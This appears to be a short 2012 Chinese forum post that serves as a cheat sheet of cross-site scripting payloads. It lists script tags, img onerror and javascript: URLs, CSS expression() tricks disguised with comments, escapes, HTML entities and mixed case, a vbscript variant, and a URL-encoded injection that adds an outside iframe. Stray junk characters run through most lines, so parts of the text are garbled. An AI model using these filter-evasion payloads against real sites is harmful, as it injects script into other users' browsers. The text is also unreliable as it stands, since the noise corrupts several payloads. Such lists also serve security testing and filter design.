<script>alert("跨站")</script> (最常用)- ^0 [4 \% R! D2 R
<img scr=javascript:alert("跨站")></img>* J& _* Z: }* I
<img scr="javascript: alert(/跨站/)></img>$ C ]% \& Q+ Q$ [
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格), Y8 y5 @9 H; W9 U( D% K- b+ r3 f
<img scr="#" onerror=alert(/跨站/)></img>
, z0 s+ ~) i2 y/ S4 U) T<img scr="#" style="xss:expression(alert(/xss/));"></img>
% ?: e3 {: S: B1 ?<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
! J7 M+ J4 I" j* [# D) l<img src=vbscript:msgbox ("xss")></img>
; Z1 N4 W, t" m a<style> input {left:expression (alert('xss'))}</style>
7 h# O1 z, q, {: e, x. x1 W5 s ~<div style={left:expression (alert('xss'))}></div>1 \: }, o9 D+ e- _( `
<div style={left:exp/* */ression (alert('xss'))}></div>, y) I1 }3 x- Y5 P1 N- M
<div style={left:\0065\0078ression (alert('xss'))}></div>- f3 w: h+ u* }* ]; `
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>+ p8 N9 m7 l0 b- l; [6 v
unicode <div style="{left:expRessioN (alert('xss'))}">
0 y* H/ {* X) m; |5 r* D( x2 E, D" _- n. E8 [
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
: K4 _/ V) M! g, q4 V) D |
发表于 2012-9-15 14:09:13
收藏
支持
反对